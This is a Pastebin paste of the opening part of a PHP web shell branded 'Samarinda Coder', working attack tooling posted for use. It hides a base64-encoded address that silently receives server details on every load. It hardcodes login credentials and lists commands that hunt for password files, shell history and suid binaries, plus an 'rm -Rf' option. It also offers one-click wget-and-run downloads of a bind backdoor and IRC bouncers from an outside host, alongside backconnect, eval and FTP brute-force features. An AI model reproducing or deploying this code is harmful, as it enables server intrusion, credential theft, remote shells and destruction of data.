samarinda-coder

ngewe

Apr 7th, 2012
384
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 155.26 KB | None | 0 0
  1. session_start();
  2. set_time_limit(9999999);
  3. $login= base64_decode("dGVhbQ==");
  4. $password= base64_decode("c2FtYXJpbmRhLWNvZGVy");
  5. $auth=1;
  6. $version='Samarinda Coder';
  7. $style='<STYLE>BODY{background-color: #000000;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
  8. $header='<html><head><title>'.getenv("HTTP_HOST").' - Login</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>'; $sd98 = base64_decode("d29uZGhvQGhhY2tlcm1haWwuY29t");;
  9. $footer='</body></html>';
  10. $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
  11. if(@$_POST['action']=="exit")unset($_SESSION['an']);
  12. if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
  13.  
  14. if($_SESSION['an']==0){
  15. echo $header;
  16. echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
  17. echo $footer;
  18. exit;}
  19. ##[ CONFIGURATIONS ]##
  20. ##[ URL ]##
  21. $sh_mainurl = 'http://priv8.hacker-newbie.org/';
  22. $alecs_sourcesurl = $sh_mainurl."alecs.txt";
  23. $sh_sourcez = array(
  24. "--==[HN-Crew WebShell]==--" => array($sh_mainurl."shellz/cyberz.txt","alecs.php"),
  25. "psyBNC" => array($sh_mainurl."toolz/psy.tgz","fx.tgz"),
  26. "Eggdrop" => array($sh_mainurl."toolz/egg.tgz","fxb.tgz"),
  27. "BindDoor" => array($sh_mainurl."toolz/bind.tgz","bind.tgz"),
  28. );
  29. ##[ AUTHENTICATION ]##
  30. $auth = array(
  31. "login" => "team",
  32. "pass" => "samarinda-coder",
  33. "md5pass" => "5f386abfba24fa5b9b37638156d8740b",
  34. "hostallow" => array("*"),
  35. "denied" => "<a href=\"$sh_mainurl\">".sh_name()."</a>: access denied!",
  36. );
  37. ##[ ADVANCED ]##
  38. $tmp_dir = "";
  39. $log_email = "ngocok@homo.com";
  40. $sess_cookie = "flazercook";
  41. $sort_default = "0a";
  42. $sort_save = TRUE;
  43. $copy_unset = FALSE;
  44. $gzipencode = TRUE;
  45. $filestealth = TRUE;
  46. $hexdump_lines = 8;
  47. $hexdump_rows = 24;
  48. $auto_surl = TRUE;
  49. ##[ QUICK COMMANDS ]##
  50. if (!is_windows()) {
  51. $cmdaliases = array(
  52. array("List Directory", "ls -al"),
  53. array("Find all suid files", "find / -type f -perm -04000 -ls"),
  54. array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
  55. array("Find all sgid files", "find / -type f -perm -02000 -ls"),
  56. array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  57. array("Find config.inc.php files", "find / -type f -name config.inc.php"),
  58. array("Find config* files", "find / -type f -name \"config*\""),
  59. array("Find config* files in current dir", "find . -type f -name \"config*\""),
  60. array("Find all writable folders and files", "find / -perm -2 -ls"),
  61. array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
  62. array("Find all writable folders", "find / -type d -perm -2 -ls"),
  63. array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
  64. array("Find all service.pwd files", "find / -type f -name service.pwd"),
  65. array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
  66. array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
  67. array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  68. array("Find all .bash_history files", "find / -type f -name .bash_history"),
  69. array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
  70. array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  71. array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  72. array("List file attributes on a Linux second extended file system", "lsattr -va"),
  73. array("Show opened ports", "netstat -an | grep -i listen"),
  74. array("-----",""),
  75. array("Logged in users","w"),
  76. array("Last connect","lastlog"),
  77. array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
  78. array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
  79. array("Inet Address","/sbin/ifconfig | grep inet"),
  80. array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
  81. array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
  82. array("CPU Info","cat /proc/version /proc/cpuinfo"),
  83. array("Is gcc installed ?","locate gcc"),
  84. array("Format box (DANGEROUS)","rm -Rf"),
  85. array("-----",""),
  86. array("wget & run psyBNC","wget ".$sh_sourcez["psyBNC"][0].";tar -zxf ".$sh_sourcez["psyBNC"][1].";cd .fx;./config 29110;./fuck;./run"),
  87. array("wget & extract EggDrop","wget ".$sh_sourcez["Eggdrop"][0].";tar -zxf ".$sh_sourcez["psyBNC"][1]),
  88. array("wget & run BindDoor","wget ".$sh_sourcez["BindDoor"][0].";tar -zxvf ".$sh_sourcez["BindDoor"][1].";./bind"),
  89. array("-----",""),
  90. array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
  91. );
  92. }
  93. else {
  94. #Windows
  95. $cmdaliases = array(
  96. array("List Directory", "dir"),
  97. array("Find index.php in current dir", "dir /s /w /b index.php"),
  98. array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
  99. array("Find c99shell in current dir", "find /c \"c99\" *"),
  100. array("Find r57shell in current dir", "find /c \"r57\" *"),
  101. array("Find fx29shell in current dir", "find /c \"fx29\" *"),
  102. array("Show active connections", "netstat -an"),
  103. array("Show running services", "net start"),
  104. array("User accounts", "net user"),
  105. array("Show computers", "net view"),
  106. );
  107. }
  108. ##[ PHP FILESYSTEM ]##
  109. $phpfsaliases = array(
  110. array("Read File", "read", 1, "File", ""),
  111. array("Write File (PHP5)", "write", 2, "File","Text"),
  112. array("Copy", "copy", 2, "From", "To"),
  113. array("Rename/Move", "rename", 2, "File", "To"),
  114. array("Delete", "delete", 1 ,"File", ""),
  115. array("Make Dir","mkdir", 1, "Dir", ""),
  116. array("Download", "download", 2, "URL", "To"),
  117. array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"),
  118. array("Change Perm (0755)", "chmod", 2, "File", "Perms"),
  119. array("Find Writable Dir", "fwritabledir", 2 ,"Dir", "Max"),
  120. array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"),
  121. );
  122. if ( !function_exists("posix_getpwuid") ) { function posix_getpwuid($uid) { return FALSE; } }
  123. if ( !function_exists("posix_getgrgid") ) { function posix_getgrgid($gid) { return FALSE; } }
  124. if ( !function_exists("posix_kill") ) { function posix_kill($gid) { return FALSE; } }
  125. #############################
  126. ##[ END OF CONFIGURATIONS ]##
  127. #############################
  128. @set_time_limit(0);
  129. @ini_set("max_execution_time", 0);
  130. @ignore_user_abort(TRUE);
  131. @set_magic_quotes_runtime(0);
  132.  
  133. if ( get_magic_quotes_gpc() )
  134. strips($GLOBALS);
  135. $_REQUEST = array_merge($_COOKIE, $_GET, $_POST);
  136. $d = @$_REQUEST["d"];
  137. $f = @$_REQUEST["f"];
  138. @extract($_REQUEST["flazercook"]);
  139. foreach ($_REQUEST as $k => $v) {
  140. if ( !isset($$k) ) { $$k = $v; }
  141. }
  142. ##[ SELF URL ]##
  143. if ( $auto_surl ) {
  144. $include = "&";
  145. foreach (explode("&",getenv("QUERY_STRING")) as $v) {
  146. $v = explode("=",$v);
  147. $name = urldecode($v[0]);
  148. $value = @urldecode($v[1]);
  149. $needles = array("http://","https://","ssl://","ftp://","\\\\");
  150. foreach ($needles as $needle) {
  151. if ( strpos($value, $needle) === 0 ) {
  152. $includestr .= urlencode($name)."=".urlencode($value)."&";
  153. }
  154. }
  155. }
  156. }
  157. if ( empty($surl) )
  158. $surl = htmlspecialchars("?".@$includestr);
  159. $img_tag = '<img src="'.$surl.'act=img&img=';
  160. ##[ QUICK LAUNCH ]##
  161. $quicklaunch = array(
  162. array($img_tag."home\" alt=\"Home\">",$surl),
  163. array($img_tag."back\" alt=\"Back\">","#\" onclick=\"history.back(1)"),
  164. array($img_tag."forward\" alt=\"Forward\">","#\" onclick=\"history.go(1)"),
  165. array($img_tag."up\" alt=\"Up\">",$surl."act=ls&d=%upd&sort=%sort"),
  166. array($img_tag."search\" alt=\"Search\">",$surl."act=search&d=%d"),
  167. array($img_tag."buffer\" alt=\"Buffer\">",$surl."act=fsbuff&d=%d"),
  168. array($img_tag."help\" alt=\"About\">",$surl."act=about"),
  169. array("-",""),
  170. array("Security",$surl."act=security&d=%d"),
  171. array("Processes",$surl."act=processes&d=%d"),
  172. array("MySQL",$surl."act=sql&d=%d"),
  173. array("Jumping",$surl."act=jump"),
  174. array("Symlink",$surl."act=sym&act=sym"),
  175. array("Backconnect",$surl."act=bc&d=%d"),
  176. array("Eval",$surl."act=eval&d=%d"),
  177. array("Encoder",$surl."act=encoder&d=%d"),
  178. array("Mailer",$surl."act=fxmailer"),
  179. array("Toolz",$surl."act=tools&d=%d"),
  180. array("Packetstorm",packetstorm()),
  181. array("Feedback",$surl."act=feedback"),
  182. array("Kill Shell",$surl."act=selfremove")
  183. );
  184. if ( !is_windows() )
  185. $quicklaunch[] = array("<br>FTP Brute",$surl."act=ftpquickbrute&d=%d");
  186. ##[ FILE TYPES ]##
  187. $ftypes = array(
  188. "html" => array("html","htm","shtml"),
  189. "txt" => array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  190. "exe" => array("sh","install","bat","cmd","sys","com"),
  191. "ini" => array("ini","inf","conf"),
  192. "code" => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  193. "img" => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  194. "sdb" => array("sdb"),
  195. "phpsess" => array("sess"),
  196. "download" => array("exe","com","sys","pif","src","lnk","zip","rar","gz","tar","pdf")
  197. );
  198. $exeftypes = array(
  199. "php -q %f%" => array("php","php3","php4"),
  200. "perl %f%" => array("pl","cgi")
  201. );
  202. $regxp_highlight = array(
  203. array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FF6600>","</font>"),
  204. array("\.tgz$",1,"<font color=#C082FF>","</font>"),
  205. array("\.gz$",1,"<font color=#C082FF>","</font>"),
  206. array("\.tar$",1,"<font color=#C082FF>","</font>"),
  207. array("\.zip$",1,"<font color=#C082FF>","</font>"),
  208. array("\.rar$",1,"<font color=#C082FF>","</font>"),
  209. array("\.php$",1,"<font color=#00FF00>","</font>"),
  210. array("\.jpg$",1,"<font color=#00FFFF>","</font>"),
  211. array("\.jpeg$",1,"<font color=#00FFFF>","</font>"),
  212. array("\.ico$",1,"<font color=#00FFFF>","</font>"),
  213. array("\.gif$",1,"<font color=#00FFFF>","</font>"),
  214. array("\.png$",1,"<font color=#00FFFF>","</font>"),
  215. array("\.htm$",1,"<font color=#00CCFF>","</font>"),
  216. array("\.html$",1,"<font color=#00CCFF>","</font>"),
  217. array("\.txt$",1,"<font color=#C0C0C0>","</font>"),
  218. array("\.pdf$",1,"<font color=#FF99CC>","</font>")
  219. );
  220. ##[ HIGHLIGHT CODE ]##
  221. $highlight_bg = "#E0E0E0";
  222. $highlight_comment = "#FF6600";
  223. $highlight_default = "#000080";
  224. $highlight_html = "#1300FF";
  225. $highlight_keyword = "#007700";
  226. $highlight_string = "#FF0000";
  227. @ini_set("highlight.bg", $highlight_bg);
  228. @ini_set("highlight.comment", $highlight_comment);
  229. @ini_set("highlight.default", $highlight_default);
  230. @ini_set("highlight.html", $highlight_html);
  231. @ini_set("highlight.keyword", $highlight_keyword);
  232. @ini_set("highlight.string", $highlight_string);
  233. #############################
  234. ##[ END OF CONFIGURATIONS ]##
  235. #############################
  236. ####################
  237. ##[ AUTHENTICATE ]##
  238. ####################
  239. foreach ($auth["hostallow"] as $k => $v) {
  240. $tmp[] = str_replace("\\*",".*",preg_quote($v));
  241. }
  242. $s = "!^(".implode("|",$tmp).")$!i";
  243. if ( !preg_match($s, getenv("REMOTE_ADDR")) and !preg_match($s, gethostbyaddr(getenv("REMOTE_ADDR"))) ) {
  244. exit("<a href=\"$sh_mainurl\">".sh_name()."</a>ACCESS DENIED! Your host (".getenv("REMOTE_ADDR").") not allowed!");
  245. }
  246. /* DISABLED FOR RFI INJECTION
  247. if ( !empty($auth["login"]) ) {
  248. if ( empty($auth["md5pass"]) )
  249. $auth["md5pass"] = md5($auth["pass"]);
  250. if ( ($_SERVER["PHP_AUTH_USER"] != $auth["login"]) or (md5($_SERVER["PHP_AUTH_PW"]) != $auth["md5pass"]) ) {
  251. header("WWW-Authenticate: Basic realm=\"".sh_name().": Restricted Area\"");
  252. header("HTTP/1.0 401 Unauthorized");
  253. die($auth["denied"]);
  254. }
  255. }
  256. */
  257. ###############
  258. ##[ ACTIONS ]##
  259. ###############
  260. if ( !isset($act) ) $act = "";
  261. if ( $act == "img" ) {
  262. @ob_clean();
  263. $images = imagez();
  264. $imgequals = array(
  265. "ext_tar" => array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
  266. "ext_php" => array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
  267. "ext_cpp" => array("ext_c"),
  268. "ext_jpg" => array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
  269. "ext_html" => array("ext_html","ext_htm"),
  270. "ext_avi" => array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
  271. "ext_lnk" => array("ext_lnk","ext_url"),
  272. "ext_ini" => array("ext_ini","ext_css","ext_inf","ext_conf"),
  273. "ext_doc" => array("ext_doc","ext_dot","ext_xls","ext_pdf"),
  274. "ext_js" => array("ext_js","ext_vbs"),
  275. "ext_cmd" => array("ext_cmd","ext_bat","ext_pif","ext_com"),
  276. "ext_wri" => array("ext_wri","ext_rtf"),
  277. "ext_txt" => array("ext_txt","ext_lng"),
  278. "ext_swf" => array("ext_swf","ext_fla"),
  279. "ext_mp3" => array("ext_mp3","ext_au","ext_midi","ext_mid","ext_wav"),
  280. "ext_htaccess" => array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
  281. );
  282. #Show all available images
  283. if ($img == "listall") {
  284. foreach ($imgequals as $a=>$b) {
  285. foreach ($b as $d) {
  286. if ( ($a != $d) && (!empty($images[$d])) )
  287. echo("Warning! Remove \$images[".$d."]<br>");
  288. }
  289. }
  290. natsort($images);
  291. $k = array_keys($images);
  292. echo "<body style=\"color: #00FF00\" bgcolor=black>";
  293. foreach ($k as $u) { echo "<img src=\"".$surl."act=img&img=".$u."\"> $u "; }
  294. exit;
  295. }
  296. #Image header
  297. header("Content-type: image/gif");
  298. header("Cache-control: public");
  299. header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  300. header("Cache-control: max-age=".(60*60*24*7));
  301. header("Last-Modified: ".date("r",filemtime(__FILE__)));
  302.  
  303. foreach ($imgequals as $k=>$v) {
  304. if (in_array($img,$v)) { $img = $k; break; }
  305. }
  306. if (empty($images[$img])) { $img = "small_unk"; }
  307. echo base64_decode($images[$img]);
  308. exit;
  309. ##[ DEFAULT ACTIONS ]##
  310. } else {
  311. $lastdir = realpath(".");
  312. chdir("./");
  313. #Preparing buffer
  314. $sess_data = @unserialize($_COOKIE[$sess_cookie]);
  315. if (!is_array($sess_data)) { $sess_data = array(); }
  316. if (!is_array(@$sess_data["copy"])) { $sess_data["copy"] = array(); }
  317. if (!is_array(@$sess_data["cut"])) { $sess_data["cut"] = array(); }
  318. fx29_buff_prepare();
  319.  
  320. foreach (array("sort","sql_sort") as $v) {
  321. if (!empty($_GET[$v])) { $$v = $_GET[$v]; }
  322. if (!empty($_POST[$v])) { $$v = $_POST[$v]; }
  323. }
  324. if ($sort_save) {
  325. if (!empty($sort)) { setcookie("sort",$sort); }
  326. if (!empty($sql_sort)) { setcookie("sql_sort",$sql_sort); }
  327. }
  328. if (!isset($sort)) { $sort = $sort_default; }
  329. $sort = htmlspecialchars($sort);
  330. $sort[1] = strtolower($sort[1]);
  331. ##[ ACTIONS ]##
  332. if ($act == "gofile") {
  333. if (is_dir($f)) {
  334. $d = $f;
  335. $act = "ls";
  336. }
  337. else {
  338. $d = dirname($f);
  339. $f = basename($f);
  340. $act = "f";
  341. }
  342. }
  343. #Starting output buffer
  344. ob_start();
  345. ob_implicit_flush(0);
  346. ##[ HEADERS ]##
  347. header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
  348. header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
  349. header("Cache-Control: no-store, no-cache, must-revalidate");
  350. header("Cache-Control: post-check=0, pre-check=0", FALSE);
  351. header("Pragma: no-cache");
  352. $tmp_dir = realpath($tmp_dir);
  353. $tmp_dir = str_replace("\\",DIRECTORY_SEPARATOR,$tmp_dir);
  354. if (substr($tmp_dir,-1) != DIRECTORY_SEPARATOR)
  355. $tmp_dir .= DIRECTORY_SEPARATOR;
  356. if (!is_array(@$actbox))
  357. $actbox = array();
  358. $dspact = $act = htmlspecialchars($act);
  359. $disp_fullpath = $ls_arr = $notls = null;
  360. #Variabel Directory
  361. $ud = @urlencode($d);
  362. if (empty($d))
  363. $d = realpath(".");
  364. elseif (realpath($d))
  365. $d = realpath($d);
  366. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  367. if (substr($d,-1) != DIRECTORY_SEPARATOR)
  368. $d .= DIRECTORY_SEPARATOR;
  369. $d = str_replace("\\\\","\\",$d);
  370. $dispd = htmlspecialchars($d);
  371. #Safemode Status
  372. if (safemode()) {
  373. $hsafemode = '<font class="on"><b>SAFE MODE IS ON</b></font>';
  374. $safemodeexecdir = @ini_get("safe_mode_exec_dir");
  375. }
  376. else {
  377. $hsafemode = '<font class="off"><b>SAFE MODE IS OFF</b></font>';
  378. }
  379. #Open Basedir Status
  380. $v = @ini_get("open_basedir");
  381. if (strtolower($v) == "on") { $hopenbasedir = '<font class="on">'.$v.'</font>'; }
  382. else { $hopenbasedir = '<font class="off">OFF (Not Secure)</font>'; }
  383. $wd = (is_writable($d)) ? '<font class="on">[W]</font>' : '<font class="off">[R]</font>';
  384. ##################
  385. ##[ HTML START ]##
  386. ##################
  387. echo html_style();
  388. ?>
  389. <!-- Main Menu -->
  390. <div id="main">
  391. <div class="bartitle"><?php echo html_header() ?></div>
  392. <table id="pagebar">
  393. <!-- Server Info -->
  394. <tr><td colspan="2">
  395. <div class="fleft"><?php echo $hsafemode; ?></div>
  396. <div class="fright">
  397. IP Address: <a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=<?php echo @gethostbyname($_SERVER["HTTP_HOST"]); ?>"><?php echo @gethostbyname($_SERVER["HTTP_HOST"]); ?></a>
  398. You: <a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=<?php echo $_SERVER["REMOTE_ADDR"]; ?>"><?php echo $_SERVER["REMOTE_ADDR"]; ?></a>
  399. </div>
  400. </td></tr>
  401. <tr><td width="50%">
  402. <table class="info">
  403. <?php
  404. srv_info("Software",srv_software($surl));
  405. srv_info("Uname",php_uname());
  406. srv_info("User",(is_windows()) ? get_current_user()." (uid=".getmyuid()." gid=".getmygid().")" : fx29exec("id"));
  407. ?>
  408. </table>
  409. </td>
  410. <td width="50%">
  411. <table class="info">
  412. <?php
  413. if (is_windows()) { srv_info("Drives",disp_drives($d,$surl)); }
  414. srv_info("Freespace",disp_freespace($d));
  415. ?>
  416. </table>
  417. </td></tr>
  418.  
  419. <tr><td colspan="2">
  420. <?php
  421. echo "\t\t\t".get_status();
  422. echo "<br>\n";
  423. echo (isset($safemodeexecdir)) ? "\n\t\t\tSafemodeExecDir: ".$safemodeexecdir."<br>" : "";
  424. echo (showdisfunc()) ? "\t\t\tDisFunc: ".showdisfunc() : "";
  425. echo "\n";
  426. ?>
  427. </td></tr>
  428. <!-- End of Server Info -->
  429.  
  430. <!-- Quicklaunch -->
  431. <tr><td colspan="2" class="quicklaunch">
  432. <?php
  433. ##[ QUICKLAUNCH ]##
  434. foreach($quicklaunch as $item) {
  435. if ($item[0] == "-") {
  436. echo "\t\t</td></tr>\n";
  437. echo "\t\t<tr><td colspan=\"2\" class=\"quicklaunch\">\n";
  438. }
  439. else {
  440. $item[1] = str_replace("%d",urlencode($d),$item[1]);
  441. $item[1] = str_replace("%sort",$sort,$item[1]);
  442. $v = realpath($d."..");
  443. if (empty($v)) {
  444. $a = explode(DIRECTORY_SEPARATOR,$d);
  445. unset($a[count($a)-2]);
  446. $v = join(DIRECTORY_SEPARATOR,$a);
  447. }
  448. $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  449. echo "\t\t\t<a href=\"".$item[1]."\">".$item[0]."</a>\n";
  450. }
  451. }
  452. ?>
  453. </td></tr>
  454. <!-- End of Quicklaunch -->
  455.  
  456. <!-- Directory Info -->
  457. <tr><td colspan="2">
  458. <div class="fleft">
  459. <?php
  460. $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
  461. $i = 0;
  462. foreach($pd as $b) {
  463. $t = ""; $j = 0;
  464. foreach ($e as $r) {
  465. $t.= $r.DIRECTORY_SEPARATOR;
  466. if ($j == $i) { break; }
  467. $j++;
  468. }
  469. echo "\t\t\t<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\">".htmlspecialchars($b).DIRECTORY_SEPARATOR."</a>\n";
  470. $i++;
  471. }
  472. echo "\t\t\t";
  473. echo (is_writable($d)) ? "<b>".view_perms_color($d)."</b>" : "<b>".view_perms_color($d)."</b>";
  474. echo "\n";
  475. ?>
  476. </div>
  477. <div class="fright">
  478. <form name="f_dir" method="post">
  479. <input type="hidden" name="act" value="ls">
  480. Directory: <input type="text" name="d" size="60" value="<?php echo $dispd; ?>"> <input type=submit value="Go">
  481. </form>
  482. </div>
  483. </td></tr>
  484. <!-- End of Directory Info -->
  485. </table>
  486. </div>
  487. <!-- End of Main Menu -->
  488. <!-- Main Info -->
  489. <div id="maininfo">
  490. <?php
  491. #########################
  492. ##[ INFORMATION TABLE ]##
  493. #########################
  494. if ($act == "") { $act = $dspact = "ls"; }
  495. ##[ SQL ]##
  496. if ($act == "sql") {
  497. $sql_surl = $surl."act=sql";
  498. if (!isset($sql_login)) { $sql_login = ""; }
  499. if (!isset($sql_passwd)) { $sql_passwd = ""; }
  500. if (!isset($sql_server)) { $sql_server = ""; }
  501. if (!isset($sql_port)) { $sql_port = ""; }
  502. if (!isset($sql_tbl)) { $sql_tbl = ""; }
  503. if (!isset($sql_act)) { $sql_act = ""; }
  504. if (!isset($sql_tbl_act)) { $sql_tbl_act = ""; }
  505. if (!isset($sql_order)) { $sql_order = ""; }
  506. if (!isset($sql_act)) { $sql_act = ""; }
  507. if (!isset($sql_getfile)) { $sql_getfile = ""; }
  508. #SQL URL Setting
  509. if (@$sql_login) { $sql_surl .= "&sql_login=".htmlspecialchars($sql_login); }
  510. if (@$sql_passwd) { $sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd); }
  511. if (@$sql_server) { $sql_surl .= "&sql_server=".htmlspecialchars($sql_server); }
  512. if (@$sql_port) { $sql_surl .= "&sql_port=".htmlspecialchars($sql_port); }
  513. if (@$sql_db) { $sql_surl .= "&sql_db=".htmlspecialchars($sql_db); }
  514. $sql_surl .= "&";
  515. ?>
  516. <!-- SQL Manager -->
  517. <?php bar_header(".: Samarinda Coder Team MSQL Jumper) :."); ?>
  518. <div class="barheader"><?php
  519. if (@$sql_server) {
  520. $sql_sock = @mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  521. $err = mysql_smarterror($sql_sock);
  522. @mysql_select_db($sql_db,$sql_sock);
  523. if (@$sql_query and $submit) {
  524. $sql_query_result = mysql_query($sql_query,$sql_sock);
  525. $sql_query_error = mysql_smarterror($sql_sock);
  526. }
  527. }
  528. else { $sql_sock = FALSE; }
  529. if (!$sql_sock) {
  530. if (!@$sql_server) { echo "No Connection!"; }
  531. else { disp_error("ERROR: ".$err); }
  532. }
  533. else {
  534. #SQL Quicklaunch
  535. $sqlquicklaunch = array();
  536. $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  537. $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
  538. $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
  539. $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
  540. $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
  541. $sqlquicklaunch[] = array("Logout",$surl."act=sql");
  542. echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") Server: ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
  543. if (count($sqlquicklaunch) > 0) {
  544. foreach($sqlquicklaunch as $item) {
  545. echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
  546. }
  547. }
  548. }
  549. ?>
  550. </div>
  551. <table>
  552. <tr>
  553. <?php
  554. #Login Form
  555. if (!$sql_sock) {
  556. ?>
  557. <td>
  558. <form name="f_sql" action="<?php echo $surl; ?>" method="post">
  559. <input type="hidden" name="act" value="sql">
  560. <table class="explorer">
  561. <tr>
  562. <th>Username<br><input type="text" name="sql_login" value="root"></th>
  563. <th>Password<br><input type="password" name="sql_passwd" value=""></th>
  564. <th>Database<br><input type="text" name="sql_db" value=""></th>
  565. <th>Host<br><input type="text" name="sql_server" value="localhost"></th>
  566. <th>Port<br><input type="text" name="sql_port" value="3306" size="3"></th>
  567. </tr>
  568. <tr><th colspan="5"><input type="submit" value="Connect"></th></tr>
  569. </table>
  570. </form>
  571. <?php
  572. }
  573. else {
  574. #Start left panel
  575. ?>
  576. <td>
  577. <center>
  578. <a href="<?php echo $sql_surl; ?>"><b>HOME</b></a>
  579. <hr size="1" noshade>
  580. <?php
  581. $result = mysql_list_dbs($sql_sock);
  582. if (!$result) { echo mysql_smarterror(); }
  583. else {
  584. ?>
  585. Database
  586. <form action="<?php echo $surl?>">
  587. <input type="hidden" name="act" value="sql">
  588. <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
  589. <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
  590. <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
  591. <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
  592. <select name="sql_db" onchange="this.form.submit()">
  593. <?php
  594. $c = 0;
  595. $dbs = "";
  596. while ($row = mysql_fetch_row($result)) {
  597. $dbs .= "\t\t<option value=\"".$row[0]."\"";
  598. if (@$sql_db == $row[0]) { $dbs .= " selected"; }
  599. $dbs .= ">".$row[0]."</option>\n";
